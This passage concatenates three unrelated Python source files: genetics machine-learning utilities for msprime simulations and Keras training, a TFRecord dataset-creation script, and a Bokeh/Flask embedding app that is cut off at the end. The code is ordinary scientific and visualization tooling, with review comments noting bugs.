            u=np.mean(info["rho"])
            sd=np.std(info["rho"])
            for j in range(len(predictions)):
                # Only report windows with enough SNPs to be reliable.
                if nSNPs[j] >= minS:
                    fOUT.write("%s\t%s\t%s\t%s\t%s\n" %(chrom,ct,min(ct+win,last),nSNPs[j],relu(sd*predictions[j][0]+u)))
                ct+=win
    return None
#-------------------------------------------------------------------------------------------
def runModels(ModelFuncPointer,
            ModelName,
            TrainDir,
            TrainGenerator,
            ValidationGenerator,
            TestGenerator,
            resultsFile=None,
            numEpochs=10,
            epochSteps=100,
            validationSteps=1,
            network=None,
            nCPU = 1,
            gpuID = 0):
    """Build, train, and evaluate a model; pickle the training history.

    ModelFuncPointer: callable building a compiled model from one (x, y)
    batch; network: [json_path, weights_path] where the architecture and
    best weights are saved and then reloaded for evaluation. The history
    dict (losses, test predictions, truth, name) is pickled to resultsFile.
    """
    # Pin computation to the requested GPU.
    os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
    ## The following code block appears necessary for running with tf2 and cudnn
    from tensorflow.compat.v1 import ConfigProto
    from tensorflow.compat.v1 import Session
    config = ConfigProto()
    config.gpu_options.allow_growth = True
    Session(config=config)
    ###
    if(resultsFile == None):
        # NOTE(review): `trainFile` is not defined anywhere in this function,
        # so this fallback path raises NameError if ever taken -- confirm the
        # intended source (TrainDir?) before relying on it.
        resultsFilename = os.path.basename(trainFile)[:-4] + ".p"
        resultsFile = os.path.join("./results/",resultsFilename)
    x,y = TrainGenerator.__getitem__(0)
    model = ModelFuncPointer(x,y)
    # Early stopping and saving the best weights
    callbacks_list = [
            EarlyStopping(
                monitor='val_loss',
                verbose=1,
                min_delta=0.01,
                patience=100),
            ModelCheckpoint(
                filepath=network[1],
                monitor='val_loss',
                save_best_only=True),
            TerminateOnNaN()
            ]
    if nCPU > 1:
        # Multiprocess data loading: one worker per CPU.
        history = model.fit(TrainGenerator,
            steps_per_epoch=epochSteps,
            epochs=numEpochs,
            validation_data=ValidationGenerator,
            callbacks=callbacks_list,
            use_multiprocessing=True,
            max_queue_size=nCPU,
            workers=nCPU)
    else:
        history = model.fit(TrainGenerator,
            steps_per_epoch=epochSteps,
            epochs=numEpochs,
            validation_data=ValidationGenerator,
            callbacks=callbacks_list,
            use_multiprocessing=False)
    # Write the network
    if(network != None):
        ##serialize model to JSON
        model_json = model.to_json()
        with open(network[0], "w") as json_file:
            json_file.write(model_json)
    # Load json and create model (reloads the checkpointed best weights,
    # not the final-epoch weights).
    if(network != None):
        jsonFILE = open(network[0],"r")
        loadedModel = jsonFILE.read()
        jsonFILE.close()
        model=model_from_json(loadedModel)
        model.load_weights(network[1])
    else:
        print("Error: model and weights not loaded")
        sys.exit(1)
    x,y = TestGenerator.__getitem__(0)
    predictions = model.predict(x)
    history.history['loss'] = np.array(history.history['loss'])
    history.history['val_loss'] = np.array(history.history['val_loss'])
    history.history['predictions'] = np.array(predictions)
    history.history['Y_test'] = np.array(y)
    history.history['name'] = ModelName
    print("results written to: ",resultsFile)
    pickle.dump(history.history, open( resultsFile, "wb" ))
    return None
#-------------------------------------------------------------------------------------------
#def indicesGenerator(batchSize,numReps):
# '''
# Generate indices randomly from range (0,numReps) in batches of size batchSize
# without replacement.
#
# This is for the batch generator to randomly choose trees from a directory
# but make sure
# '''
# availableIndices = np.arange(numReps)
# np.random.shuffle(availableIndices)
# ci = 0
# while 1:
# if((ci+batchSize) > numReps):
# ci = 0
# np.random.shuffle(availableIndices)
# batchIndices = availableIndices[ci:ci+batchSize]
# ci = ci+batchSize
#
# yield batchIndices
#-------------------------------------------------------------------------------------------
def getHapsPosLabels(direc,simulator,shuffle=False):
    '''
    Walk a trees directory created by the data generator class and return the
    respective genotype matrices, site positions, and labels for every
    replicate.  (`simulator` and `shuffle` are accepted but not used here.)
    '''
    # labels were pickled alongside the replicates in info.p under key "y"
    with open(os.path.join(direc, "info.p"), "rb") as info_fh:
        labels = pickle.load(info_fh)["y"]
    # every file in the directory except 'info.p' is a numbered .trees replicate
    numReps = len(os.listdir(direc)) - 1
    haps, positions = [], []
    for rep in range(numReps):
        treeSequence = msp.load(os.path.join(direc, str(rep) + ".trees"))
        haps.append(treeSequence.genotype_matrix())
        positions.append(np.array([site.position for site in treeSequence.sites()]))
    return np.array(haps), np.array(positions), labels
#-------------------------------------------------------------------------------------------
def simplifyTreeSequenceOnSubSampleSet_stub(ts,numSamples):
    '''
    Take a tree sequence, draw a random subset of numSamples individuals, and
    return the tree sequence simplified down to that subset's sample nodes.
    '''
    ts = ts.simplify()  # NOTE(review): possibly redundant pre-simplification -- confirm
    inds = [ind.id for ind in ts.individuals()]
    # BUG FIX: was `sample_size`, an undefined name -> NameError at runtime;
    # the parameter is called numSamples.
    sample_subset = np.sort(np.random.choice(inds,numSamples,replace=False))
    sample_nodes = []
    for i in sample_subset:
        ind = ts.individual(i)
        # assumes diploid individuals with exactly two nodes each -- TODO confirm
        sample_nodes.append(ind.nodes[0])
        sample_nodes.append(ind.nodes[1])
    ts = ts.simplify(sample_nodes)
    return ts
#-------------------------------------------------------------------------------------------
def sort_min_diff(amat):
    '''this function takes in a SNP matrix with indv on rows and returns the same matrix with indvs sorted by genetic similarity.
    this problem is NP, so here we use a nearest neighbors approx. it's not perfect, but it's fast and generally performs ok.
    assumes your input matrix is a numpy array'''
    # BUG FIX: pass n_neighbors by keyword -- scikit-learn >= 1.0 rejects the
    # old positional form (TypeError).
    mb = NearestNeighbors(n_neighbors=len(amat), metric='manhattan').fit(amat)
    distances, indices = mb.kneighbors(amat)
    # pick the row whose summed distance to all its neighbors is smallest,
    # then reorder the matrix by that row's neighbor ordering
    smallest = np.argmin(distances.sum(axis=1))
    return amat[indices[smallest]]
#-------------------------------------------------------------------------------------------
def mutateTrees(treesDirec,outputDirec,muLow,muHigh,numMutsPerTree=1,simulator="msprime"):
    '''
    Read .trees files from treesDirec and mutate each tree numMutsPerTree
    separate times using a mutation rate drawn uniformly from [muLow, muHigh);
    also re-write the info file in outputDirec to reflect the new replicates.
    '''
    if(numMutsPerTree > 1):
        # expanding the replicate count in place would clobber inputs
        assert(treesDirec != outputDirec)
    if not os.path.exists(outputDirec):
        print("directory '",outputDirec,"' does not exist, creating it")
        os.makedirs(outputDirec)
    infoFilename = os.path.join(treesDirec,"info.p")
    infoDict = pickle.load(open(infoFilename,"rb"))
    labels = infoDict["y"]
    newLabels = []
    newMaxSegSites = 0
    # how many trees files are in this directory (minus one for 'info.p')
    li = os.listdir(treesDirec)
    numReps = len(li) - 1
    for i in range(numReps):
        filename = str(i) + ".trees"
        filepath = os.path.join(treesDirec,filename)
        treeSequence = msp.load(filepath)
        # strip existing mutations so each re-mutation starts from a clean tree
        blankTreeSequence = msp.mutate(treeSequence,0)
        rho = labels[i]
        # BUG FIX: the loop and bookkeeping below used the undefined name
        # `numMuts` (NameError); the parameter is numMutsPerTree.
        for mut in range(numMutsPerTree):
            simNum = (i*numMutsPerTree) + mut
            simFileName = os.path.join(outputDirec,str(simNum)+".trees")
            mutationRate = np.random.uniform(muLow,muHigh)
            mutatedTreeSequence = msp.mutate(blankTreeSequence,mutationRate)
            mutatedTreeSequence.dump(simFileName)
            newMaxSegSites = max(newMaxSegSites,mutatedTreeSequence.num_sites)
            newLabels.append(rho)
    infoCopy = copy.deepcopy(infoDict)
    # BUG FIX: was `newMaxSeqSites` (typo) -> NameError
    infoCopy["maxSegSites"] = newMaxSegSites
    if(numMutsPerTree > 1):
        infoCopy["y"] = np.array(newLabels,dtype="float32")
        infoCopy["numReps"] = numReps * numMutsPerTree
    outInfoFilename = os.path.join(outputDirec,"info.p")
    # BUG FIX: was `infocopy` (wrong capitalisation) -> NameError
    pickle.dump(infoCopy,open(outInfoFilename,"wb"))
    return None
#-------------------------------------------------------------------------------------------
def segSitesStats(treesDirec):
    '''
    DEPRECATED: return the number of segregating sites for each .trees
    replicate found in treesDirec.
    '''
    # Cleanup: removed dead locals (newLabels, newMaxSegSites) and an unused
    # pickle.load of info.p that the original never read.
    # Every file in the directory except 'info.p' is a numbered .trees replicate.
    numReps = len(os.listdir(treesDirec)) - 1
    segSites = []
    for i in range(numReps):
        filepath = os.path.join(treesDirec, str(i) + ".trees")
        treeSequence = msp.load(filepath)
        segSites.append(treeSequence.num_sites)
    return segSites
#-------------------------------------------------------------------------------------------
def mae(x,y):
    '''
    Compute mean absolute error between predictions and targets
    float[],float[] -> float
    '''
    assert(len(x) == len(y))
    # average the element-wise absolute differences
    return sum(abs(a - b) for a, b in zip(x, y)) / len(x)
#-------------------------------------------------------------------------------------------
def mse(x,y):
    '''
    Compute mean squared error between predictions and targets
    float[],float[] -> float
    '''
    assert(len(x) == len(y))
    # average the element-wise squared differences
    return sum((a - b) ** 2 for a, b in zip(x, y)) / len(x)
#-------------------------------------------------------------------------------------------
def plotResults(resultsFile,saveas):
    '''
    plotting code for testing a model on simulation.
    using the resulting pickle file on a training run (resultsFile).
    This function plots the results of the final test set predictions,
    as well as validation loss as a function of Epochs during training.
    Saves the figure to `saveas`.
    '''
    plt.rc('font', family='serif', serif='Times')
    plt.rc('xtick', labelsize=6)
    plt.rc('ytick', labelsize=6)
    plt.rc('axes', labelsize=6)
    results = pickle.load(open( resultsFile , "rb" ))
    fig,axes = plt.subplots(2,1)
    plt.subplots_adjust(hspace=0.5)
    predictions = np.array([float(Y) for Y in results["predictions"]])
    realValues = np.array([float(X) for X in results["Y_test"]])
    # summary statistics shown in the scatter-plot title
    r_2 = round((np.corrcoef(predictions,realValues)[0,1])**2,5)
    mae_0 = round(mae(realValues,predictions),4)
    mse_0 = round(mse(realValues,predictions),4)
    labels = "$R^{2} = $"+str(r_2)+"\n"+"$mae = $" + str(mae_0)+" | "+"$mse = $" + str(mse_0)
    axes[0].scatter(realValues,predictions,marker = "o", color = 'tab:purple',s=5.0,alpha=0.6)
    # make both axes share identical limits so the y=x line is meaningful
    lims = [
        np.min([axes[0].get_xlim(), axes[0].get_ylim()]), # min of both axes
        np.max([axes[0].get_xlim(), axes[0].get_ylim()]), # max of both axes
    ]
    axes[0].set_xlim(lims)
    axes[0].set_ylim(lims)
    axes[0].plot(lims, lims, 'k-', alpha=0.75, zorder=0)
    axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
    # Cleanup: removed unused local `lossRowIndex`.
    axes[1].plot(results["loss"],label = "mae loss",color='tab:cyan')
    axes[1].plot(results["val_loss"], label= "mae validation loss",color='tab:pink')
    #axes[1].plot(results["mean_squared_error"],label = "mse loss",color='tab:green')
    #axes[1].plot(results["val_mean_squared_error"], label= "mse validation loss",color='tab:olive')
    axes[1].legend(frameon = False,fontsize = 6)
    # NOTE(review): label says "mse" but the curves plotted above are mae -- confirm
    axes[1].set_ylabel("mse")
    axes[0].set_ylabel(str(len(predictions))+" msprime predictions")
    axes[0].set_xlabel(str(len(realValues))+" msprime real values")
    fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
    height = 7.00
    width = 7.00
    axes[0].grid()
    fig.set_size_inches(height, width)
    fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def getMeanSDMax(trainDir):
    '''
    get the mean and standard deviation of rho from training set
    str -> int,int,int
    '''
    with open(os.path.join(trainDir, "info.p"), "rb") as info_fh:
        info = pickle.load(info_fh)
    tar_mean = np.mean(info["rho"], axis=0)
    tar_sd = np.std(info["rho"], axis=0)
    # maxSegSites is the longest replicate; used to pad/truncate inputs upstream
    return tar_mean, tar_sd, max(info["segSites"])
#-------------------------------------------------------------------------------------------
def unNormalize(mean,sd,data):
    '''
    Invert the z-score transform (un-zcore-ify) to recover real-valued
    predictions: data * sd + mean.
    float,float,float[] -> float[]
    '''
    # deliberately uses in-place ops: ndarray callers see `data` scaled in place
    data *= sd
    data += mean ##comment this line out for GRU_TUNED84_RELU
    return data
#-------------------------------------------------------------------------------------------
def plotParametricBootstrap(results,saveas):
    '''
    Plot the output of a parametric bootstrap run: `results` is the pickle
    produced at the bootstrap "out" location, `saveas` the figure path.
    '''
    with open(results, "rb") as stats_fh:
        stats = pickle.load(stats_fh)
    x = stats["rho"]
    fig, ax = plt.subplots()
    # skip the first key (assumed to be "rho", the x axis -- TODO confirm
    # key ordering); plot every remaining series against it
    for idx, key in enumerate(stats):
        if idx > 0:
            ax.plot(x, stats[key])
    # equalise the axes so the y=x reference line is meaningful
    lims = [
        np.min([ax.get_xlim(), ax.get_ylim()]),
        np.max([ax.get_xlim(), ax.get_ylim()]),
    ]
    ax.set_xlim(lims)
    ax.set_ylim(lims)
    ax.plot(lims, lims, 'k-', alpha=0.75, zorder=0)
    fig.savefig(saveas)
    return None
|
create_tfrecords.py | """
Create the tfrecord files for a dataset.
This script is taken from the Visipedia repo: https://github.com/visipedia/tfrecords
A lot of this code comes from the tensorflow inception example, so here is their license:
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
import argparse
from datetime import datetime
import hashlib
import json
import os
from queue import Queue
import random
import sys
import threading
import numpy as np
import tensorflow as tf
def _int64_feature(value):
    """Wrapper for inserting int64 features into Example proto."""
    # accept either a scalar or a list; protobuf wants a list
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def _float_feature(value):
    """Wrapper for inserting float features into Example proto."""
    # accept either a scalar or a list; protobuf wants a list
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def _bytes_feature(value):
    """Wrapper for inserting bytes features into Example proto."""
    # accept either a scalar or a list; protobuf wants a list
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=values))
def _validate_text(text):
"""If text is not str or unicode, then try to convert it to str."""
if isinstance(text, str):
return text.encode()
else:
return str(text).encode()
def _str_and_encode(value):
return str(value).encode()
def _convert_to_example(image_example, image_buffer, height, width,
                        colorspace='RGB', channels=3, image_format='JPEG'):
    """Build an Example proto for an example.
    Args:
      image_example: dict, an image example
      image_buffer: string, JPEG encoding of RGB image
      height: integer, image height in pixels
      width: integer, image width in pixels
      colorspace: string, colorspace of the pixels in image_buffer (e.g. 'RGB')
      channels: integer, number of channels in image_buffer
      image_format: string, encoding of image_buffer (e.g. 'JPEG')
    Returns:
      Example proto
    """
    # Required
    filename = str(image_example['filename']).encode() # default encoding='utf-8'
    image_id = str(image_example['id']).encode()
    # Class label for the whole image
    image_class = image_example.get('class', {})
    class_label = image_class.get('label', 0)
    class_text = _validate_text(image_class.get('text', ''))
    class_conf = image_class.get('conf', 1.)
    # Objects
    image_objects = image_example.get('object', {})
    object_count = image_objects.get('count', 0)
    # Bounding Boxes (parallel lists, one entry per object)
    image_bboxes = image_objects.get('bbox', {})
    xmin = image_bboxes.get('xmin', [])
    xmax = image_bboxes.get('xmax', [])
    ymin = image_bboxes.get('ymin', [])
    ymax = image_bboxes.get('ymax', [])
    bbox_scores = image_bboxes.get('score', [])
    bbox_labels = image_bboxes.get('label', [])
    bbox_text = list(map(_validate_text, image_bboxes.get('text', [])))
    bbox_label_confs = image_bboxes.get('conf', [])
    # Parts (keypoints: x/y coords, visibility flag, score)
    image_parts = image_objects.get('parts', {})
    parts_x = image_parts.get('x', [])
    parts_y = image_parts.get('y', [])
    parts_v = image_parts.get('v', [])
    parts_s = image_parts.get('score', [])
    # Areas
    object_areas = image_objects.get('area', [])
    # Ids
    object_ids = list(map(_str_and_encode, image_objects.get('id', [])))
    # Any extra data (e.g. stringified json)
    extra_info = str(image_class.get('extra', '')).encode()
    # Additional fields for the format needed by the Object Detection repository
    key = hashlib.sha256(image_buffer).hexdigest().encode()
    is_crowd = image_objects.get('is_crowd', [])
    # For explanation of the fields, see https://github.com/visipedia/tfrecords
    example = tf.train.Example(features=tf.train.Features(feature={
        'image/height': _int64_feature(height),
        'image/width': _int64_feature(width),
        'image/colorspace': _bytes_feature(colorspace.encode()),
        'image/channels': _int64_feature(channels),
        'image/format': _bytes_feature(image_format.encode()),
        'image/filename': _bytes_feature(filename),
        'image/id': _bytes_feature(image_id),
        'image/encoded': _bytes_feature(image_buffer),
        'image/extra': _bytes_feature(extra_info),
        'image/class/label': _int64_feature(class_label),
        'image/class/text': _bytes_feature(class_text),
        'image/class/conf': _float_feature(class_conf),
        'image/object/bbox/xmin': _float_feature(xmin),
        'image/object/bbox/xmax': _float_feature(xmax),
        'image/object/bbox/ymin': _float_feature(ymin),
        'image/object/bbox/ymax': _float_feature(ymax),
        'image/object/bbox/label': _int64_feature(bbox_labels),
        'image/object/bbox/text': _bytes_feature(bbox_text),
        'image/object/bbox/conf': _float_feature(bbox_label_confs),
        'image/object/bbox/score': _float_feature(bbox_scores),
        'image/object/parts/x': _float_feature(parts_x),
        'image/object/parts/y': _float_feature(parts_y),
        'image/object/parts/v': _int64_feature(parts_v),
        'image/object/parts/score': _float_feature(parts_s),
        'image/object/count': _int64_feature(object_count),
        'image/object/area': _float_feature(object_areas),
        'image/object/id': _bytes_feature(object_ids),
        # Additional fields for format needed by Object Detection repository
        'image/source_id': _bytes_feature(image_id),
        'image/key/sha256': _bytes_feature(key),
        'image/object/class/label': _int64_feature(bbox_labels),
        'image/object/class/text': _bytes_feature(bbox_text),
        'image/object/is_crowd': _int64_feature(is_crowd)
    }))
    return example
class ImageCoder:
    """Helper class that provides TensorFlow image coding utilities.

    Builds a small TF graph once (PNG->JPEG re-encode and JPEG decode) and
    reuses a single Session for all calls.
    NOTE(review): this uses the TF1 graph API (tf.Session / tf.placeholder);
    under TF2 it would need tf.compat.v1 -- confirm the intended TF version.
    """
    def __init__(self):
        # Create a single Session to run all image coding calls.
        self._sess = tf.Session()
        # Initializes function that converts PNG to JPEG data.
        self._png_ph = tf.placeholder(dtype=tf.string)
        image = tf.image.decode_png(self._png_ph, channels=3)
        self._png_to_jpeg = tf.image.encode_jpeg(
            image, format='rgb', quality=100)
        # Initializes function that decodes RGB JPEG data.
        self._decode_jpeg_ph = tf.placeholder(dtype=tf.string)
        self._decode_jpeg = tf.image.decode_jpeg(
            self._decode_jpeg_ph, channels=3)
    def png_to_jpeg(self, image_data):
        # Convert the image data from png to jpg
        return self._sess.run(self._png_to_jpeg,
                              feed_dict={self._png_ph: image_data})
    def decode_jpeg(self, image_data):
        # Decode the image data as a jpeg image into an H x W x 3 uint8 array
        image = self._sess.run(self._decode_jpeg, feed_dict={
            self._decode_jpeg_ph: image_data})
        assert len(image.shape) == 3, "JPEG must be 3-D (H x W x C)"
        assert image.shape[2] == 3, "JPEG needs to have 3 channels (RGB)"
        return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
_, file_extension = os.path.splitext(filename)
return file_extension.lower() == '.png'
def _process_image(filename, coder):
    """Process a single image file.
    Args:
      filename: string, path to an image file e.g., '/path/to/example.JPG'.
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
    Returns:
      image_buffer: string, JPEG encoding of RGB image.
      height: integer, image height in pixels.
      width: integer, image width in pixels.
    """
    # Read the raw bytes ('rb' per https://github.com/tensorflow/tensorflow/issues/11312)
    image_data = tf.gfile.FastGFile(filename, 'rb').read()
    # PNGs get re-encoded so everything stored downstream is JPEG.
    if _is_png(filename):
        image_data = coder.png_to_jpeg(image_data)
    # Decode to verify the bytes and to measure the image.
    decoded = coder.decode_jpeg(image_data)
    assert len(decoded.shape) == 3
    height, width, num_channels = decoded.shape
    assert num_channels == 3
    return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, output_directory,
                               dataset, num_shards, store_images, error_queue):
    """Processes and saves list of images as TFRecord in 1 thread.
    Args:
      coder: instance of ImageCoder to provide TensorFlow image coding utils.
      thread_index: integer, unique batch to run index is within [0, len(ranges)).
      ranges: list of pairs of integers specifying ranges of each batches to
        analyze in parallel.
      name: string, unique identifier specifying the data set (e.g. `train` or `test`)
      output_directory: string, file path to store the tfrecord files.
      dataset: list, a list of image example dicts
      num_shards: integer number of shards for this data set.
      store_images: bool, should the image be stored in the tfrecord
      error_queue: Queue, a queue to place image examples that failed.
    """
    # Each thread produces N shards where N = int(num_shards / num_threads).
    # For instance, if num_shards = 128, and the num_threads = 2, then the first
    # thread would produce shards [0, 64).
    num_threads = len(ranges)
    assert not num_shards % num_threads
    num_shards_per_batch = int(num_shards / num_threads)
    # Evenly split this thread's index range across its shards.
    shard_ranges = np.linspace(ranges[thread_index][0],
                               ranges[thread_index][1],
                               num_shards_per_batch + 1).astype(int)
    num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
    counter = 0
    error_counter = 0
    for s in range(num_shards_per_batch):
        # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
        shard = thread_index * num_shards_per_batch + s
        output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
        output_file = os.path.join(output_directory, output_filename)
        writer = tf.io.TFRecordWriter(output_file)
        shard_counter = 0
        files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
        for i in files_in_shard:
            image_example = dataset[i]
            filename = str(image_example['filename'])
            try:
                if store_images:
                    # Prefer pre-encoded bytes carried in the example itself;
                    # otherwise read and encode the image from disk.
                    if 'encoded' in image_example:
                        image_buffer = image_example['encoded']
                        height = image_example['height']
                        width = image_example['width']
                        colorspace = image_example['colorspace']
                        image_format = image_example['format']
                        num_channels = image_example['channels']
                        example = _convert_to_example(image_example, image_buffer, height,
                                                      width, colorspace, num_channels,
                                                      image_format)
                    else:
                        image_buffer, height, width = _process_image(filename, coder)
                        example = _convert_to_example(image_example, image_buffer, height,
                                                      width)
                else:
                    # Metadata-only record: no image bytes are embedded.
                    image_buffer=''
                    height = int(image_example['height'])
                    width = int(image_example['width'])
                    example = _convert_to_example(image_example, image_buffer, height,
                                                  width)
                writer.write(example.SerializeToString())
                shard_counter += 1
                counter += 1
            except Exception as e:
                #raise
                # Failed examples are reported via error_queue rather than
                # aborting the whole shard.
                print('Exception in making example for {}.'.format(i))
                print('Filename: {}'.format(filename))
                error_counter += 1
                error_msg = repr(e)
                image_example['error_msg'] = error_msg
                error_queue.put(image_example)
            if not counter % 1000:
                print('%s [thread %d]: Processed %d of %d images in thread batch, with %d errors.' %
                      (datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
                sys.stdout.flush()
        print('%s [thread %d]: Wrote %d images to %s, with %d errors.' %
              (datetime.now(), thread_index, shard_counter, output_file, error_counter))
        sys.stdout.flush()
        shard_counter = 0
    print('%s [thread %d]: Wrote %d images to %d shards, with %d errors.' %
          (datetime.now(), thread_index, counter, num_files_in_thread, error_counter))
    sys.stdout.flush()
def create(dataset, dataset_name, output_directory, num_shards, num_threads, shuffle=True, store_images=True):
    """Create the tfrecord files to be used to train or test a model.
    Args:
      dataset : list of image example dicts; each needs at least "filename"
        and "id", optionally "class" {label, text} and "object" {bbox {xmin,
        xmax, ymin, ymax, label}, ...} (see module docstring for the schema).
      dataset_name: a name for the dataset; used as the shard filename prefix.
      output_directory: path to a directory to write the tfrecord files
      num_shards: the number of tfrecord files to create
      num_threads: the number of threads to use (must divide num_shards)
      shuffle : bool, should the image examples be shuffled or not prior to creating the tfrecords.
      store_images: bool, embed the encoded image bytes in each record.
    Returns:
      list : a list of image examples that failed to process.
    """
    # Images in the tfrecords set must be shuffled properly
    if shuffle:
        random.shuffle(dataset)
    # Break all images into batches with a [ranges[i][0], ranges[i][1]].
    # BUG FIX: `np.int` was removed in NumPy 1.24 (AttributeError); the
    # builtin int is the documented replacement.
    spacing = np.linspace(0, len(dataset), num_threads + 1).astype(int)
    ranges = []
    for i in range(len(spacing) - 1):
        ranges.append([spacing[i], spacing[i+1]])
    # Launch a thread for each batch.
    print('Launching %d threads for spacings: %s' % (num_threads, ranges))
    sys.stdout.flush()
    # Create a mechanism for monitoring when all threads are finished.
    coord = tf.train.Coordinator()
    # Create a generic TensorFlow-based utility for converting all image codings.
    coder = ImageCoder()
    # A Queue to hold the image examples that fail to process.
    error_queue = Queue()
    # Cleanup: removed a duplicate `threads = []` initialisation.
    threads = []
    for thread_index in range(len(ranges)):
        args = (coder, thread_index, ranges, dataset_name, output_directory, dataset,
                num_shards, store_images, error_queue)
        t = threading.Thread(target=_process_image_files_batch, args=args)
        t.start()
        threads.append(t)
    # Wait for all the threads to terminate.
    coord.join(threads)
    print('%s: Finished writing all %d images in data set.' %
          (datetime.now(), len(dataset)))
    # Collect the errors
    errors = []
    while not error_queue.empty():
        errors.append(error_queue.get())
    print('%d examples failed.' % (len(errors),))
    return errors
def parse_args():
    """Build and parse the command-line arguments for tfrecord creation."""
    parser = argparse.ArgumentParser(description='Basic statistics on tfrecord files')
    # required inputs
    parser.add_argument('--dataset_path', dest='dataset_path', type=str, required=True,
                        help='Path to the dataset json file.')
    parser.add_argument('--prefix', dest='dataset_name', type=str, required=True,
                        help='Prefix for the tfrecords (e.g. `train`, `test`, `val`).')
    parser.add_argument('--output_dir', dest='output_dir', type=str, required=True,
                        help='Directory for the tfrecords.')
    parser.add_argument('--shards', dest='num_shards', type=int, required=True,
                        help='Number of shards to make.')
    parser.add_argument('--threads', dest='num_threads', type=int, required=True,
                        help='Number of threads to make.')
    # optional flags (both default to off)
    parser.add_argument('--shuffle', dest='shuffle', action='store_true',
                        required=False, default=False,
                        help='Shuffle the records before saving them.')
    parser.add_argument('--store_images', dest='store_images', action='store_true',
                        required=False, default=False,
                        help='Store the images in the tfrecords.')
    return parser.parse_args()
def main():
    """Entry point: load the dataset json and write tfrecords per CLI args."""
    args = parse_args()
    with open(args.dataset_path) as dataset_file:
        dataset = json.load(dataset_file)
    # create() returns the list of examples that failed to process
    return create(
        dataset=dataset,
        dataset_name=args.dataset_name,
        output_directory=args.output_dir,
        num_shards=args.num_shards,
        num_threads=args.num_threads,
        shuffle=args.shuffle,
        store_images=args.store_images
    )
# Script entry point: build tfrecords according to the CLI arguments.
if __name__ == '__main__':
    main()
|
bkapp.py | """
Embed bokeh server session into a flask framework
Adapted from bokeh-master/examples/howto/serve_embed/flask_gunicorn_embed.py
"""
import os
import time
import asyncio
import logging
from threading import Thread
from tornado.httpserver import HTTPServer
from tornado.ioloop import IOLoop
from bokeh import __version__ as bokeh_release_ver
from bokeh.application import Application
from bokeh.application.handlers import FunctionHandler
from bokeh.plotting import figure
from bokeh.sampledata.sea_surface_temperature import sea_surface_temperature
from bokeh.server.server import BaseServer
from bokeh.server.tornado import BokehTornado
from bokeh.server.util import bind_sockets
from bokeh.themes import Theme
from bokeh.layouts import column
from bokeh.resources import get_sri_hashes_for_version
from bokeh.models.widgets import DateFormatter, TableColumn, DataTable
from bokeh.models import (
ColumnDataSource,
Slider
)
from config import (
cwd,
set_bokeh_port,
FLASK_PORT,
FLASK_ADDR,
BOKEH_ADDR,
BOKEH_URL,
BOKEH_CDN
)
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
BOKEH_BROWSER_LOGGING = """
<script type="text/javascript">
Bokeh.set_log_level("debug");
</script>
"""
def bkapp_blue(doc):
    """ Bokeh App
    Renders the sea-surface-temperature line plot ("blue" variant) with a
    slider controlling the rolling-mean window in days.
    Arguments:
        doc {Bokeh Document} -- bokeh document
    Returns:
        Bokeh Document --bokeh document with plot and slider
    """
    df = sea_surface_temperature.copy()
    source = ColumnDataSource(data=df)
    plot = figure(x_axis_type='datetime', y_range=(0, 25),
                  y_axis_label='Temperature (Celsius)',
                  title="Blue App - Sea Surface Temperature at 43.18, -70.43")
    plot.line(x='time', y='temperature', source=source)

    def callback(_attr, _old, new):
        # a window of 0 days means "no smoothing": show the raw series
        data = df if new == 0 else df.rolling('{0}D'.format(new)).mean()
        source.data = ColumnDataSource.from_df(data)

    slider = Slider(start=0, end=30, value=0, step=1, title="Application Blue")
    slider.on_change('value', callback)
    doc.theme = Theme(filename=os.path.join(cwd(), 'theme.yaml'))
    return doc.add_root(column(slider, plot))
def bkapp_red(doc):
    """ Bokeh App
    Renders the sea-surface-temperature line plot ("red" variant) with a
    slider controlling the rolling-mean window in days.
    Arguments:
        doc {Bokeh Document} -- bokeh document
    Returns:
        Bokeh Document --bokeh document with plot and slider
    """
    df = sea_surface_temperature.copy()
    source = ColumnDataSource(data=df)
    plot = figure(x_axis_type='datetime', y_range=(0, 25),
                  y_axis_label='Temperature (Celsius)',
                  title="Red App - Sea Surface Temperature at 43.18, -70.43")
    plot.line(x='time', y='temperature', source=source, line_color='red')

    def callback(_attr, _old, new):
        # a window of 0 days means "no smoothing": show the raw series
        data = df if new == 0 else df.rolling('{0}D'.format(new)).mean()
        source.data = ColumnDataSource.from_df(data)

    slider = Slider(start=0, end=30, value=0, step=1, title="Application Red")
    slider.on_change('value', callback)
    doc.theme = Theme(filename=os.path.join(cwd(), 'theme.yaml'))
    return doc.add_root(column(slider, plot))
def bkapp_table(doc):
    """Create a Table App
    Shows the sea-surface-temperature data as a selectable DataTable.
    Arguments:
        doc {Document} -- bokeh document
    Returns:
        Document -- updated bokeh document
    """
    df = sea_surface_temperature.copy()
    # promote the datetime index to a regular column so the table can show it
    df.reset_index(inplace=True)
    source = ColumnDataSource(data=df)
    table_columns = [
        TableColumn(field='time', title='Time', formatter=DateFormatter(format='yy-mm-dd')),
        TableColumn(field='temperature', title='Temperature')
    ]
    table = DataTable(source=source, columns=table_columns, width=400,
                      selectable='checkbox', index_position=None)
